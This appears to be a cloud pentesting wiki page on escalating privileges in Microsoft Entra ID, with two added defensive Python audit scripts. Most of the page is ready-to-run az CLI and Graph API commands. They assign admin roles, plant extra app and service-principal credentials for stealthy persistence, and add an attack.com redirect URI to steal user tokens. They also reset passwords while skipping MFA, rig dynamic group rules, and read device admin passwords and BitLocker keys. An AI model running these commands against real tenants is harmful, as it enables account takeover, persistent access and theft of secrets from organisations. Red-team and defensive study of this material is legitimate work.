Az - EntraID Privesc


Note

Note that not all the granular permissions that built-in roles have in Entra ID can be used in custom roles.

Roles

Role: Privileged Role Administrator

This role has the granular permissions needed to assign roles to principals and to grant more permissions to roles. Both actions can be abused to escalate privileges.

  • Assign role to a user:
# List enabled built-in roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directoryRoles"

# Give role (Global Administrator?) to a user
roleId="<roleId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"
  • Add more permissions to a role:
# List only custom roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)'

# Change the permissions of a custom role
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/<role-id>" \
--headers "Content-Type=application/json" \
--body '{
"description": "Update basic properties of application registrations",
"rolePermissions": [
{
"allowedResourceActions": [
"microsoft.directory/applications/credentials/update"
]
}
]
}'

Applications

microsoft.directory/applications/credentials/update

This allows an attacker to add credentials (passwords or certificates) to existing applications. If the application has privileged permissions, the attacker can authenticate as that application and obtain those privileges.

# Generate a new password without overwriting the existing ones
az ad app credential reset --id <appId> --append
# Generate a new certificate without overwriting the existing ones
az ad app credential reset --id <appId> --create-cert

microsoft.directory/applications.myOrganization/credentials/update

This allows the same actions as applications/credentials/update, but scoped to single-directory applications.

az ad app credential reset --id <appId> --append

microsoft.directory/applications/owners/update

By adding themselves as an owner, an attacker can control the application, including its credentials and permissions.

az ad app owner add --id <appId> --owner-object-id <userId>
az ad app credential reset --id <appId> --append

# You can check the owners with
az ad app owner list --id <appId>

microsoft.directory/applications/allProperties/update

An attacker can add a redirect URI to applications used by the tenant's users and then share with them login URLs that use the new redirect URL in order to steal their tokens. Note that if the user had already logged into the application, the authentication will be automatic, without the user needing to accept anything.

Note also that it is possible to change the permissions the application requests in order to obtain more permissions, but in that case the user will have to accept again a prompt asking for all the permissions.

# Get current redirect uris
az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris"
# Add a new redirect URI (make sure to keep the configured ones)
az ad app update --id <app-id> --web-redirect-uris "https://original.com/callback https://attack.com/callback"

Applications Privilege Escalation

As explained in this post, it was very common to find default applications that had API permissions of type Application granted. An API Permission (as it is called in the Entra ID console) of type Application means that the application can access the API and perform actions without a user context (without a user logging into the app), and without needing any Entra ID role to allow it. Therefore, it is very common to find highly privileged applications in every Entra ID tenant.

Then, if an attacker has any permission/role that allows updating the credentials (secret or certificate) of an application, the attacker can generate a new credential and use it to authenticate as the application, obtaining all the permissions that application has.

Note that the mentioned blog shares some API permissions of common Microsoft default applications, but some time after that report Microsoft fixed the issue and it is no longer possible to log in as Microsoft applications. However, it is still possible to find custom applications with high privileges that can be abused.

How to enumerate the API permissions of an application:

# Get "API Permissions" of an App
## Get the ResourceAppId
az ad app show --id "<app-id>" --query "requiredResourceAccess" --output json
## e.g.
[
{
"resourceAccess": [
{
"id": "e1fe6dd8-ba31-4d61-89e7-88639da4683d",
"type": "Scope"
},
{
"id": "d07a8cc0-3d51-4b77-b3b0-32704d1f69fa",
"type": "Role"
}
],
"resourceAppId": "00000003-0000-0000-c000-000000000000"
}
]

## For the perms of type "Scope"
az ad sp show --id <ResourceAppId> --query "oauth2PermissionScopes[?id=='<id>'].value" -o tsv
az ad sp show --id "00000003-0000-0000-c000-000000000000" --query "oauth2PermissionScopes[?id=='e1fe6dd8-ba31-4d61-89e7-88639da4683d'].value" -o tsv

## For the perms of type "Role"
az ad sp show --id <ResourceAppId> --query "appRoles[?id=='<id>'].value" -o tsv
az ad sp show --id 00000003-0000-0000-c000-000000000000 --query "appRoles[?id=='d07a8cc0-3d51-4b77-b3b0-32704d1f69fa'].value" -o tsv
Find all the API permissions of applications and mark the APIs owned by Microsoft:

#!/usr/bin/env bash
set -euo pipefail

# Known Microsoft first-party owner organization IDs.
MICROSOFT_OWNER_ORG_IDS=(
  "f8cdef31-a31e-4b4a-93e4-5f571e91255a"
  "72f988bf-86f1-41af-91ab-2d7cd011db47"
)

is_microsoft_owner() {
  local owner="$1"
  local id
  for id in "${MICROSOFT_OWNER_ORG_IDS[@]}"; do
    if [ "$owner" = "$id" ]; then
      return 0
    fi
  done
  return 1
}

get_permission_value() {
  local resource_app_id="$1"
  local perm_type="$2"
  local perm_id="$3"
  local key value
  key="${resource_app_id}|${perm_type}|${perm_id}"

  value="$(awk -F '\t' -v k="$key" '$1==k {print $2; exit}' "$tmp_perm_cache")"
  if [ -n "$value" ]; then
    printf '%s\n' "$value"
    return 0
  fi

  if [ "$perm_type" = "Scope" ]; then
    value="$(az ad sp show --id "$resource_app_id" --query "oauth2PermissionScopes[?id=='$perm_id'].value | [0]" -o tsv 2>/dev/null || true)"
  elif [ "$perm_type" = "Role" ]; then
    value="$(az ad sp show --id "$resource_app_id" --query "appRoles[?id=='$perm_id'].value | [0]" -o tsv 2>/dev/null || true)"
  else
    value=""
  fi

  [ -n "$value" ] || value="UNKNOWN"
  printf '%s\t%s\n' "$key" "$value" >> "$tmp_perm_cache"
  printf '%s\n' "$value"
}

command -v az >/dev/null 2>&1 || { echo "az CLI not found" >&2; exit 1; }
command -v jq >/dev/null 2>&1 || { echo "jq not found" >&2; exit 1; }
az account show >/dev/null

apps_json="$(az ad app list --all --query '[?length(requiredResourceAccess) > 0].[displayName,appId,requiredResourceAccess]' -o json)"

tmp_map="$(mktemp)"
tmp_ids="$(mktemp)"
tmp_perm_cache="$(mktemp)"
trap 'rm -f "$tmp_map" "$tmp_ids" "$tmp_perm_cache"' EXIT

# Build unique resourceAppId values used by applications.
jq -r '.[][2][]?.resourceAppId' <<<"$apps_json" | sort -u > "$tmp_ids"

# Resolve resourceAppId -> owner organization + API display name.
while IFS= read -r rid; do
  [ -n "$rid" ] || continue
  sp_json="$(az ad sp show --id "$rid" --query '{owner:appOwnerOrganizationId,name:displayName}' -o json 2>/dev/null || true)"
  owner="$(jq -r '.owner // "UNKNOWN"' <<<"$sp_json")"
  name="$(jq -r '.name // "UNKNOWN"' <<<"$sp_json")"
  printf '%s\t%s\t%s\n' "$rid" "$owner" "$name" >> "$tmp_map"
done < "$tmp_ids"

echo -e "appDisplayName\tappId\tresourceApiDisplayName\tresourceAppId\tisMicrosoft\tpermissions"

# Print all app API permissions and mark if the target API is Microsoft-owned.
while IFS= read -r row; do
  app_name="$(jq -r '.[0]' <<<"$row")"
  app_id="$(jq -r '.[1]' <<<"$row")"

  while IFS= read -r rra; do
    resource_app_id="$(jq -r '.resourceAppId' <<<"$rra")"
    map_line="$(awk -F '\t' -v id="$resource_app_id" '$1==id {print; exit}' "$tmp_map")"
    owner_org="$(awk -F'\t' '{print $2}' <<<"$map_line")"
    resource_name="$(awk -F'\t' '{print $3}' <<<"$map_line")"

    [ -n "$owner_org" ] || owner_org="UNKNOWN"
    [ -n "$resource_name" ] || resource_name="UNKNOWN"

    if is_microsoft_owner "$owner_org"; then
      is_ms="true"
    else
      is_ms="false"
    fi

    permissions_csv=""
    while IFS= read -r access; do
      perm_type="$(jq -r '.type' <<<"$access")"
      perm_id="$(jq -r '.id' <<<"$access")"
      perm_value="$(get_permission_value "$resource_app_id" "$perm_type" "$perm_id")"
      perm_label="${perm_type}:${perm_value}"
      if [ -z "$permissions_csv" ]; then
        permissions_csv="$perm_label"
      else
        permissions_csv="${permissions_csv},${perm_label}"
      fi
    done < <(jq -c '.resourceAccess[]' <<<"$rra")

    echo -e "${app_name}\t${app_id}\t${resource_name}\t${resource_app_id}\t${is_ms}\t${permissions_csv}"
  done < <(jq -c '.[2][]' <<<"$row")
done < <(jq -c '.[]' <<<"$apps_json")
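From the defender's side, the same Scope/Role resolution can rank which registrations to lock down first. The following is an added example, not code from the page or from HackTricks: it runs that resolution over constructed sample data shaped like the az output above and flags the apps whose application-type permissions would hand directory control to anyone able to add a credential or an owner. The Graph appId and the permission names are real; the permission ids, app names and app inventory are constructed.

```python
# Added example: rank app registrations by what a credentials/update or
# owners/update on them would hand an attacker, over constructed az-shaped data.
GRAPH = "00000003-0000-0000-c000-000000000000"  # Microsoft Graph's well-known appId

# Constructed resource SP manifest (fields `az ad sp show` returns); the
# id -> permission mapping is made up for this example, not Graph's real ids.
RESOURCE_SPS = {GRAPH: {
    "displayName": "Microsoft Graph",
    "oauth2PermissionScopes": [{"id": "s-0001", "value": "User.Read"}],
    "appRoles": [{"id": "r-0001", "value": "Directory.ReadWrite.All"},
                 {"id": "r-0002", "value": "Mail.Read"}],
}}

def _app(name, app_id, access, creds):
    """Constructed app in the shape of one `az ad app list -o json` element."""
    return {"displayName": name, "appId": app_id, "passwordCredentials": creds,
            "keyCredentials": [],
            "requiredResourceAccess": [{"resourceAppId": GRAPH, "resourceAccess": access}]}

APPS = [
    _app("hr-sync", "app-1", [{"id": "s-0001", "type": "Scope"},
                              {"id": "r-0001", "type": "Role"}], [{"keyId": "k1"}]),
    _app("mail-reader", "app-2", [{"id": "r-0002", "type": "Role"}], []),
    _app("portal", "app-3", [{"id": "s-0001", "type": "Scope"}], [{"keyId": "k2"}]),
]

# Graph application permissions that amount to control of the directory for
# whoever can authenticate as the app (real permission names; not exhaustive).
TAKEOVER_ROLES = {"Directory.ReadWrite.All", "RoleManagement.ReadWrite.Directory",
                  "Application.ReadWrite.All", "AppRoleAssignment.ReadWrite.All"}

def resolve(app, resource_sps):
    """[(api, type, permission)] for one app; Scope = delegated (needs a user),
    Role = application permission, usable with no signed-in user at all."""
    out = []
    for rra in app.get("requiredResourceAccess", []):
        sp = resource_sps.get(rra["resourceAppId"], {})
        scopes = {p["id"]: p["value"] for p in sp.get("oauth2PermissionScopes", [])}
        roles = {r["id"]: r["value"] for r in sp.get("appRoles", [])}
        api = sp.get("displayName", rra["resourceAppId"])
        for a in rra.get("resourceAccess", []):
            table = scopes if a["type"] == "Scope" else roles
            out.append((api, a["type"], table.get(a["id"], "UNKNOWN:" + a["id"])))
    return out

def triage(app, resource_sps=RESOURCE_SPS):
    """critical: a new credential yields tenant-takeover permissions; high: any other
    app-only permission; low: delegated scopes only. Existing creds are informational:
    credentials/update adds one anyway, so their absence is no mitigation."""
    app_only = sorted(v for _, t, v in resolve(app, resource_sps) if t == "Role")
    takeover = sorted(set(app_only) & TAKEOVER_ROLES)
    return {"app": app["displayName"], "appOnly": app_only, "takeover": takeover,
            "hasCredentials": bool(app.get("passwordCredentials") or app.get("keyCredentials")),
            "severity": "critical" if takeover else ("high" if app_only else "low")}

def triage_all(apps, resource_sps=RESOURCE_SPS):
    """Most dangerous first: these are the apps whose owners and credentials to audit."""
    order = {"critical": 0, "high": 1, "low": 2}
    return sorted((triage(a, resource_sps) for a in apps), key=lambda r: order[r["severity"]])
```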

Service Principals

microsoft.directory/servicePrincipals/credentials/update

This allows an attacker to add credentials to existing service principals. If the service principal has elevated privileges, the attacker can take over those privileges.

az ad sp credential reset --id <sp-id> --append

Caution

The newly generated password won't be visible in the web console, so this can be a stealthy way to maintain persistence over a service principal.
From the API they can be found with:

az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json

If you get the error "code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid." it is because the passwordCredentials property of the SP is locked and you first need to unlock it. For that you need a permission (microsoft.directory/applications/allProperties/update) that lets you run:

# The lock is a property of the application object, so this targets the app's object id
az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/<app-object-id> --body '{"servicePrincipalLockConfiguration": null}'

microsoft.directory/servicePrincipals/synchronizationCredentials/manage

This allows an attacker to add credentials to existing service principals. If the service principal has elevated privileges, the attacker can take over those privileges.

az ad sp credential reset --id <sp-id> --append

microsoft.directory/servicePrincipals/owners/update

As with applications, this permission allows adding more owners to a service principal. Owning a service principal grants control over its credentials and permissions.

# Add new owner
spId="<spId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"

az ad sp credential reset --id $spId --append

# You can check the owners with
az ad sp owner list --id <spId>

Caution

After adding a new owner, I tried to remove it, but the API replied that the DELETE method was not supported, even though that is the method you need to use to delete an owner. So you can't remove owners nowadays.

microsoft.directory/servicePrincipals/disable and enable

These permissions allow disabling and enabling service principals. An attacker could use them to enable a service principal they could somehow gain access to in order to escalate privileges.

Note that with this technique the attacker will need further permissions in order to take control of the enabled service principal.

# Disable
az ad sp update --id <ServicePrincipalId> --account-enabled false

# Enable
az ad sp update --id <ServicePrincipalId> --account-enabled true

microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials & microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials

These permissions allow creating and reading single sign-on credentials, which can grant access to third-party applications.

# Generate SSO creds for a user or a group
spID="<spId>"
user_or_group_id="<id>"
username="<username>"
password="<password>"
az rest --method POST \
--uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}"


# Get the SSO credentials created on the service principal for a given user or group
credID="<user-or-group-id>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spID/getPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$credID\"}"

Groups

microsoft.directory/groups/allProperties/update

This permission allows adding users to privileged groups, leading to privilege escalation.

az ad group member add --group <GroupName> --member-id <UserId>

Note: This permission does not include Entra ID role-assignable groups.

microsoft.directory/groups/owners/update

This permission allows becoming the owner of groups. A group owner can manage the group's membership and settings, and could therefore escalate privileges through the group.

az ad group owner add --group <GroupName> --owner-object-id <UserId>
az ad group member add --group <GroupName> --member-id <UserId>

Note: This permission does not include Entra ID role-assignable groups.

microsoft.directory/groups/members/update

This permission allows adding members to a group. An attacker could add themselves or a malicious account to privileged groups, which could grant elevated access.

az ad group member add --group <GroupName> --member-id <UserId>

microsoft.directory/groups/dynamicMembershipRule/update

This permission allows updating the membership rule of a dynamic group. An attacker could modify dynamic rules so that they are included in privileged groups without being added directly.

groupId="<group-id>"
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/groups/$groupId" \
--headers "Content-Type=application/json" \
--body '{
"membershipRule": "(user.otherMails -any (_ -contains \"security\")) -and (user.userType -eq \"guest\")",
"membershipRuleProcessingState": "On"
}'

Note: This permission does not include Entra ID role-assignable groups.

Dynamic Groups Privesc

It might be possible for users to escalate privileges by modifying their own attributes so that they get added as members of dynamic groups. For more information check:

Az - Dynamic Groups Privesc

Users

microsoft.directory/users/password/update

This permission allows resetting the password of non-admin users, letting a potential attacker escalate privileges to other users. This permission cannot be assigned to custom roles.

# Update user password
userId="<user-id>"
az ad user update --id "$userId" --password "kweoifuh.234"

# Update user password without needing to change or use MFA on next sign-in
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/users/$userId" \
--headers "Content-Type=application/json" \
--body "{
\"passwordProfile\": {
\"forceChangePasswordNextSignInWithMfa\": false,
\"forceChangePasswordNextSignIn\": false,
\"password\": \"kweoifuh.234\"
}
}"

microsoft.directory/users/basic/update

This permission allows modifying user attributes. It is common to find dynamic groups that add users based on attribute values, so this permission could allow a user to set the attribute value required to become a member of a specific dynamic group and escalate privileges.

#e.g. change the manager of a user (the victim's manager reference is set to managerUser)
victimUser="<userID>"
managerUser="<userID>"
az rest --method PUT \
--uri "https://graph.microsoft.com/v1.0/users/$victimUser/manager/\$ref" \
--headers "Content-Type=application/json" \
--body "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/users/$managerUser\"}"

#e.g. change department of a user
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/users/$victimUser" \
--headers "Content-Type=application/json" \
--body "{\"department\": \"security\"}"
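An audit of dynamic membership rules against this attribute-editing path, serving both the dynamicMembershipRule/update section above and this one. It is an added example, not code from the page: it splits each rule into its top-level clauses and reports whether the group can be reached by writing only the attributes assumed here to be covered by users/basic/update. That attribute list is an assumption to verify against the role definition in your tenant; the sample rules are constructed, the first being the page's own rule.

```python
# Added example: audit dynamic-group membership rules for clauses that a
# users/basic/update holder can satisfy by editing profile attributes. Rules are
# in the form `az ad group list --query "[?membershipRule!=null].[displayName,membershipRule]"` returns.
import re

# Assumed: attributes that microsoft.directory/users/basic/update lets a
# low-privileged role write. Verify against your tenant's role definition.
WRITABLE_ATTRS = {
    "department", "jobtitle", "city", "country", "companyname", "displayname",
    "givenname", "surname", "othermails", "officelocation", "postalcode",
    "state", "streetaddress", "usagelocation",
}
# Anything else (userType, accountEnabled, objectId, ...) is treated as
# admin-controlled, so a clause keyed on it is not reachable by profile edits.

ATTR_RE = re.compile(r"\buser\.([A-Za-z0-9_]+)", re.IGNORECASE)
SPLIT_RE = re.compile(r"\(|\)|-and\b|-or\b", re.IGNORECASE)

def split_top_level(rule):
    """Split on -and / -or outside parentheses -> (operator, [clauses]).
    A rule mixing both at top level is classified by the first operator seen."""
    depth, start, op, clauses = 0, 0, None, []
    for m in SPLIT_RE.finditer(rule):
        tok = m.group(0).lower()
        if tok == "(":
            depth += 1
        elif tok == ")":
            depth -= 1
        elif depth == 0:
            clauses.append(rule[start:m.start()].strip())
            start = m.end()
            op = op or tok[1:]
    clauses.append(rule[start:].strip())
    return op, clauses

def audit_rule(rule):
    """Attributes the rule keys on, and whether it can be satisfied by writing
    only WRITABLE_ATTRS: every clause must be for -and, any clause for -or."""
    op, clauses = split_top_level(rule)
    satisfiable = []
    for clause in clauses:
        attrs = {a.lower() for a in ATTR_RE.findall(clause)}
        satisfiable.append(bool(attrs) and attrs <= WRITABLE_ATTRS)
    reachable = any(satisfiable) if op == "or" else all(satisfiable)
    return {"attributes": sorted({a.lower() for a in ATTR_RE.findall(rule)}),
            "reachable_via_profile_edit": reachable}

# Constructed sample rules: the page's otherMails/userType rule, a plain
# department rule, and an -or rule where one clause is admin-only.
SAMPLE_GROUPS = [
    ("sec-guests", '(user.otherMails -any (_ -contains "security")) -and (user.userType -eq "guest")'),
    ("sec-team", 'user.department -eq "security"'),
    ("vip-or-enabled", '(user.jobTitle -eq "CISO") -or (user.accountEnabled -eq true)'),
]

def audit_groups(groups):
    """Group name -> finding. Reachable groups need a review of who holds
    users/basic/update and whether the rule should key on admin-set data instead."""
    return {name: audit_rule(rule) for name, rule in groups}
```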

Conditional Access Policies & MFA bypass

Misconfigured conditional access policies that require MFA can be bypassed, check:

Az - Conditional Access Policies & MFA Bypass

Devices

microsoft.directory/devices/registeredOwners/update

This permission allows attackers to set themselves as owners of devices in order to gain control over, or access to, device-specific settings and data.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"}"

microsoft.directory/devices/registeredUsers/update

This permission allows attackers to associate their account with devices in order to gain access or bypass security policies.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/registeredUsers/\$ref" \
--headers "Content-Type=application/json" \
--body "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"}"

microsoft.directory/deviceLocalCredentials/password/read

This permission allows attackers to read the backed-up local administrator account credential properties of Microsoft Entra joined devices, including the password.

# List deviceLocalCredentials
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials"

# Get credentials
deviceLCID="<deviceLCID>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials"

BitlockerKeys

microsoft.directory/bitlockerKeys/key/read

This permission allows access to BitLocker keys, which could let an attacker decrypt drives, compromising data confidentiality.

# List recovery keys
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys"

# Get key
recoveryKeyId="<recoveryKeyId>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"

Other Interesting Permissions (TODO)

  • microsoft.directory/applications/permissions/update
  • microsoft.directory/servicePrincipals/permissions/update
  • microsoft.directory/applications.myOrganization/allProperties/update
  • microsoft.directory/applications/allProperties/update
  • microsoft.directory/servicePrincipals/appRoleAssignedTo/update
  • microsoft.directory/applications/appRoles/update
  • microsoft.directory/applications.myOrganization/permissions/update
